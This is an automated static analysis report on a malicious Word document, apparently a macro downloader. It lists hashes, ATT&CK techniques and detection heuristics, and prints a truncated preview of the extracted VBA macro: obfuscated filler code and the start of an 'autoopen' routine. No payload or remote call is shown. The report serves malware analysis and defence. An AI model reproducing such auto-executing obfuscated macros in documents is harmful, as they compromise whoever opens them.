Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42d21fa68553d21d…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 237.1 KB
Created: 2019-03-15 07:32:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18

MD5: 3a9223f09e5131defda4070ddc659173
SHA-1: 6b47fab1af976b5518480caf6ce480dae1761029
SHA-256: 42d21fa68553d21d0f3e96bbbbd346212d1f139c78c5933ff6ae703368418ad6

Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, meaning the macro runs automatically when the document is opened. GetObject calls within the VBA p-code suggest an attempt to execute code or load external resources. The ClamAV detection further confirms its malicious nature; the document most likely acts as a downloader for a secondary stage.

Heuristics (7)

  • ClamAV: Doc.Malware.Droo-6895763-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Droo-6895763-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 60956 bytes
SHA-256: 58d1773ba6c26fe9bc641e3112fedd94fb4bd5dbbd967718abd23289f30e2749

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "uUAAGQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YABAXD()
   If SADUQQ = iQBAADC Then
       uAAQ_AcB = 888878741 * Z_A1GA
       mACXDGwX = KDQZ4D / 538792184 / 648401493 + 540241597 * 905772087 / 824013328 + (toXAXD - Tan(ZcDAAAA + 805681129 - 851011768 - Oct(zAUQZcBD - Hex(768606491) + 36956884 + Oct(892315431))) + (480647307 / Sqr(40570017)))
       E1XQxB = 464988884 * SUDXAkBG
End If
   If XAoxwXo = qkUUUkB Then
       JkwQAAQB = 309639586 * jBGc4D
       ZUA4Qx = dAAQAAU / 794003604 / 100734420 + 385941752 * 901536742 / 212631724 + (SoAwxc - Tan(pA_Qkw_ + 512281271 - 677824301 - Oct(NwDAAA - Hex(189007814) + 442545052 + Oct(876327097))) + (871803250 / Sqr(203362537)))
       AAABoAx = 32221473 * zBAcAX
End If
   If hADcAxG = vBZZBB4c Then
       GDCUAAxU = 855403583 * sGCDAc
       OQXDCQD = JUxAAGU / 75520102 / 698186674 + 538163502 * 667638725 / 249789112 + (qQ4AXQ - Tan(dADCDC1 + 993441065 - 838481048 - Oct(aQAA1A - Hex(986194334) + 228953373 + Oct(296958164))) + (216628725 / Sqr(447222976)))
       zZD1DZX = 176219481 * r1A_BQA
End If
   If RoXGok_B = Ox1DQUQ4 Then
       vCDZBBA = 295894980 * UCAAAw
       ScAXBXw = NwDUoZ / 209823501 / 30696457 + 381666527 * 528298984 / 681695391 + (PAD_BAw - Tan(c4xABoAk + 147684985 - 273512151 - Oct(cAkAQA - Hex(605771107) + 313793255 + Oct(769051826))) + (682560952 / Sqr(418414289)))
       iZDDAo = 310648932 * jAG4GA
End If
   If DZUB1kD = iBXAwAc Then
       wDxAkBB = 685102660 * PAAAcx
       j4x_ADD = SAXwcX / 28805962 / 924213397 + 659305860 * 305546913 / 805719473 + (l44QAA - Tan(KAAo1o + 427230615 - 465388462 - Oct(JAA_oADA - Hex(139328790) + 14449318 + Oct(519724927))) + (322441204 / Sqr(700461209)))
       bBUBk1AB = 116906929 * tDGA4_X
End If
   If zDAckAX = ZUAAAAxA Then
       bUxDAwUQ = 828576262 * qwADG1
       YDDcZZC = tAAC_Q_A / 910957438 / 7896490 + 11474067 * 754344539 / 400014959 + (RQGZUCQ - Tan(ZAAAAQ + 876080710 - 864828435 - Oct(iBU1AGQX - Hex(747469874) + 300746359 + Oct(750140348))) + (667057452 / Sqr(64534236)))
       jcA__Akw = 552311063 * LxXUkA
End If
   If TQ_BXA = LAAAAw4o Then
       OAUBGUCk = 344232585 * voQAAG
       pA_AAA = iDAc1XB / 986043874 / 563166946 + 301960935 * 807096671 / 855556357 + (CUAGA_X - Tan(ckAAxA + 580273531 - 646137033 - Oct(G1QXAoA - Hex(28541599) + 539684308 + Oct(346980475))) + (336587771 / Sqr(865762115)))
       JQQUD4 = 541918621 * E4o_AAA
End If
   If FUkAAAG = bQ1AUQBA Then
       YBAXAxZA = 491993165 * roAZBDDA
       WCkDkXZ = ZcUBD4 / 306634791 / 204146704 + 780307494 * 312953431 / 339698840 + (XAUoD1 - Tan(LAcDAoG + 111908974 - 237480094 - Oct(MU4oAxBA - Hex(270982720) + 144136245 + Oct(575722000))) + (18865400 / Sqr(706819969)))
       ZDUwAX = 839933053 * dU_AUA
End If
   If EDAA4AA = L1QAcxAD Then
       oUAxADQG = 435303769 * jAB1ADU
       RAAkoACo = AxQAAGx / 69795275 / 875219443 + 48581205 * 62254386 / 265738484 + (NQxccAAw - Tan(XQBCk4AA + 716241499 - 11720814 - Oct(vCZ441B - Hex(402114629) + 828613375 + Oct(68065683))) + (545619320 / Sqr(171020734)))
       UcA4QA = 375754650 * bkDCAAAQ
End If
End Function
Sub autoopen()
On Error Resume Next
   If lAoCAAxD = u__1AUD Then
       nDwA1A = 812616669 * YAAxQA
       qwAGCD = SDQAAAA / 416222261 / 997207107 + 394096036 * 322589883 / 519404136 + (ocDc4AG - Tan(WQDBoXDQ + 273806910 - 146596640 - Oct(ExAcQQZx - Hex(140042709) + 719667344 + Oct(235671124))) + (293120058 / Sqr(233511879)))
       ic_oA_kD = 889587650 * SwA4ADA
End If
   If joAAZAA = mAZxAD Then
       uAAQAX = 278701557 * mAA4_cB
       dBADA4 = MXDBcoA / 353977103 / 267331403 + 103246264 * 230330714 / 716065697 + (IQxQAGU - Tan(wAZAAAAB + 450182160 - 599796431 - Oct(FAAAQ4AX - Hex(889495288) + 353323007 + Oct(555858182))) + (269642298 / Sqr(901513165)))
       DQc_wC = 437399596 * ZAcD_Q
End If
... (truncated)